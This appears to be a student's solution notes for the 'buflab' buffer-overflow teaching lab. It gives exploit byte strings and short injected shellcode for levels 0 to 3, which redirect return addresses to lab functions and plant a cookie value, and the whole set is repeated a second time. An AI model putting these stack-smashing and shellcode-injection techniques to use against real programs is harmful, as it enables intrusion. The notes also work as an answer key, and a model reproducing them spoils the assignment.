buflab
Level 0:
re-write return address with smoke()'s address '0x08048ef0'
so exploit file should be:
----
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 f0 8e 04 08
----
'30' can be any byte value
Level 1:
re-wirte return address with fizz()'s address '0x08048e80'
re-write argument with cookie code '0x11264556'
----
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 80 8e 04 08 56 45 26 11
----
'30' can be any byte value
Level 2:
re-write return value to the start of array 0xbfffb70c, where we put the code
the code is described below.
3: b8 56 45 26 11 mov $0x11264556,%eax
8: a3 dc b0 04 08 mov %eax,0x804b0dc
d: 68 10 8e 04 08 push $0x8048e10
12: c3 ret
re-write the value of global_value at 0x0804b0dc with cookie code 0x11264556
push bang()'s (0x08048e10) address, and return to it
----
b8 56 45 26 11 a3 dc b0 04 08 68 10 8e 04 08 c3 0c b7 ff bf
----
Level 3:
re-write return address to the start of vector 0xbfffb70c, where we put the code
re-write the saved ebp with the original value 0xbfffb748
the code is:
3: b8 56 45 26 11 mov $0x11264556,%eax
8: 68 9c 91 04 08 push $0x804919c
d: c3 ret
re-write the eax register with cookie code 0x11264556
push the real return address, and return
----
b8 56 45 26 11 68 9c 91 04 08 c3 90 48 b7 ff bf 0c b7 ff bf
----
re-write return address with smoke()'s address '0x08048ef0'
so exploit file should be:
----
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 f0 8e 04 08
----
'30' can be any byte value
Level 1:
re-wirte return address with fizz()'s address '0x08048e80'
re-write argument with cookie code '0x11264556'
----
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 80 8e 04 08 56 45 26 11
----
'30' can be any byte value
Level 2:
re-write return value to the start of array 0xbfffb70c, where we put the code
the code is described below.
3: b8 56 45 26 11 mov $0x11264556,%eax
8: a3 dc b0 04 08 mov %eax,0x804b0dc
d: 68 10 8e 04 08 push $0x8048e10
12: c3 ret
re-write the value of global_value at 0x0804b0dc with cookie code 0x11264556
push bang()'s (0x08048e10) address, and return to it
----
b8 56 45 26 11 a3 dc b0 04 08 68 10 8e 04 08 c3 0c b7 ff bf
----
Level 3:
re-write return address to the start of vector 0xbfffb70c, where we put the code
re-write the saved ebp with the original value 0xbfffb748
the code is:
3: b8 56 45 26 11 mov $0x11264556,%eax
8: 68 9c 91 04 08 push $0x804919c
d: c3 ret
re-write the eax register with cookie code 0x11264556
push the real return address, and return
----
b8 56 45 26 11 68 9c 91 04 08 c3 90 48 b7 ff bf 0c b7 ff bf
----
